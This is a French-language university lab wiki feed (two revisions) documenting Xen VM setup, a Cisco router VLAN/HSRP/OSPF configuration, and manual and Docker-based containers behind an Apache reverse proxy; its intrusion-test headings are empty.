&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49095</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49095"/>
				<updated>2018-12-21T15:20:32Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration du VLAN 131 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
